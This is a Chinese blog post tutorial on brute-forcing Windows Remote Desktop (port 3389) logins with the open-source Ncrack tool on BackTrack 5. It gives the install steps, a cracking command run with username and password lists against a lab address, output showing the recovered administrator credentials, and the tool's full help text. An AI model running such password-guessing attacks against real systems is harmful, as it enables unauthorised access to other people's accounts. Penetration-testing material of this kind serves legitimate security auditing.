2023拉

BT5下用ncrack破解3389

上一篇 / 下一篇  2012-06-13 10:56:52 / 个人分类:Linux杂谈

查看( 8625 ) / 评论( 0 ) / 评分( 0 / 0 )
首先需要到 NCRACK 官网下载,下载地址:http://nmap.org/ncrack/
Ncrack is an open source tool for network authentication cracking
其中有 LinuxWindows 版本的,使用可以参见:

Linux 下:(纠结的是我没有成功:Warning: File ./ncrack-services exists, but Ncrack is using /usr/local/share/ncrack/ncrack-services for security and consistency reasons. Set NCRACKDIR=. to give priority to files in your local directory (may affect the other data files too).

1.安装依赖包
mickey@pentestbox:~# sudo apt-get install build-essential libssl-dev libssh-dev

2.下载/编译/安装
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
make install

3.破解Windows英文版操作系统的终端服务
mickey@pentestbox:~#ncrack -vv -U windows.user -P windows.pwd 192.168.1.107:3389,CL=1 -f
PS:其中的 -U 是制定用户名的文件; -P 是指定口令的文件的意思
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-22 06:47 EDT

Discovered credentials on rdp://192.168.1.107:3389 ‘administrator’ ‘mickeymouse’
rdp://192.168.1.107:3389 finished.

Discovered credentials for rdp on 192.168.1.107 3389/tcp:
192.168.1.107 3389/tcp rdp: ‘administrator’ ‘mickeymouse’

Ncrack done: 1 service scanned in 51.01 seconds.
Probes sent: 10 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

Windows下:

官网上下载并安装 exe 文件,对应目录放置对一个的字典文件,使用上面的命令即可,在 windows server 2008 下测试多次成功,server 2003(默认配置下) 下未成功。
附命令说明:
Ncrack 0.4ALPHA ( http://ncrack.org )
Usage: ncrack [Options] {target and service specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iX <inputfilename>: Input from Nmap's -oX XML output format
  -iN <inputfilename>: Input from Nmap's -oN Normal output format
  -iL <inputfilename>: Input from list of hosts/networks
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
SERVICE SPECIFICATION:
  Can pass target specific services in <service>://target (standard) notation or
  using -p which will be applied to all hosts in non-standard notation.
  Service arguments can be specified to be host-specific, type of service-specific
  (-m) or global (-g). Ex: ssh://10.0.0.10,at=10,cl=30 -m ssh:at=50 -g cd=3000
  Ex2: ncrack -p ssh,ftp:3500,25 10.0.0.10 scanme.nmap.org google.com:80,ssl
  -p <service-list>: services will be applied to all non-standard notation hosts
  -m <service>:<options>: options will be applied to all services of this type
  -g <options>: options will be applied to every service globally
  Misc options:
    ssl: enable SSL over this service
    path <name>: used in modules like HTTP ('=' needs escaping if used)
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, unless you append 'ms'
  (miliseconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  Service-specific options:
    cl (min connection limit): minimum number of concurrent parallel connections
    CL (max connection limit): maximum number of concurrent parallel connections
    at (authentication tries): authentication attempts per connection
    cd (connection delay): delay <time> between each connection initiation
    cr (connection retries): caps number of service connection attempts
    to (time-out): maximum cracking <time> for service, regardless of success so far
  -T<0-5>: Set timing template (higher is faster)
  --connection-limit <number>: threshold for total concurrent connections
AUTHENTICATION:
  -U <filename>: username file
  -P <filename>: password file
  --user <username_list>: comma-separated username list
  --pass <password_list>: comma-separated password list
  --passwords-first: Iterate password list for each username. Default is opposite.
OUTPUT:
  -oN/-oX <file>: Output scan in normal and XML format, respectively, to the given filename.
  -oA <basename>: Output in the two major formats at once
  -v: Increase verbosity level (use twice or more for greater effect)
  -d[level]: Set or increase debugging level (Up to 10 is meaningful)
  --nsock-trace <level>: Set nsock trace level (Valid range: 0 - 10)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
MISC:
  --resume <file>: Continue previously saved session
  -f: quit cracking service after one found credential
  -6: Enable IPv6 cracking
  -sL or --list: only list hosts and services
  --datadir <dirname>: Specify custom Ncrack data file location
  -V: Print version number
  -h: Print this help summary page.
MODULES:
  FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC
EXAMPLES:
  ncrack -v --user root localhost:22
  ncrack -v -T5 https://192.168.0.1
  ncrack -v -iX ~/nmap.xml -g CL=5,to=1h
SEE THE MAN PAGE (http://nmap.org/ncrack/man.html) FOR MORE OPTIONS AND EXAMPLES

收藏 举报

TAG:

 

评分:0

我来说两句

Open Toolbar